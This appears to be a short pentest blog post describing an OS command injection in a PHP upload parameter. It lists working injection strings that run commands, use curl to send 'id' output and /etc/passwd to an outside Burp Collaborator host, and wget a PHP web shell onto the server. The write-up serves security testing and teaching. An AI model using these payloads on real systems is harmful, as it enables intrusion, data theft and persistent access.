Friday, January 7, 2022

Hacking around with os injection


During a recent pentest of an app made with php, burp gave me a little surprise of a os commend injection notification! I had fun playing around with it and it was in the oddest place. Burp had interaction with collaborator so it was a solid notification. 

The issue was found in one of the apps upload functions in a var called KeyId. Which was i think passed to the php system call (or exec,passthru,etc.) for some reason. Here is the payload burp was using to get collaborator interaction: 

14316'"`0&nslookup -q=cname fo70trk51oioge2t1p2zzdvvdmjp7fvcj46wul.burpcollaborator.net.&`' 

So for RCE I needed to use a str like: 

14316'"`0&< CMD >&`' 

First I wanted verify I had access to the system so I thought I would use curl to exfil the results of running a cmd, and my first choice was id to check my privs on the system. So I used this str: 

14316'"`0&id|curl -d @- http://fatp2jmvxxrrzecu3nrjo99thknbb0.burpcollaborator.net/&`' 

This confirmed I can run system cmds, exfil the data, and that I was running them as a low level user. Then I start to exfil files to look for priv esc and gather info. I also used curl for this to make POST requests to burp collab and put file data in POST data. Here is an example str: 

14316'"`0&curl -F file=@/etc/passwd http://fatp2jmvxxrrzecu3nrjo99thknbb0.burpcollaborator.net/&`'

 After getting a few files pulled down I figured the next move was to try to get a web shell on the system to continue to check priv esc. I would have purffered Metasploit, but due to the many network restrictions, it wasn’t an option so I figured I would try to get the system to pull down a php web shell from the web. Which worked like a charm. Here is the str I used to dl files from the web:

 14316'"`0&wget https://gist.githubusercontent.com/joswr1ght/22f40787de19d80d110b37fb79ac3985/raw/9377612eee a89aed2b226a870e76ac12965d6694/easy-simple-php-webshell.php&`' 

Because the web shell is a github project I changed the name of the shell right away incase of automated scanners looking for easy wins. So that is it, have fun and stay safe out there.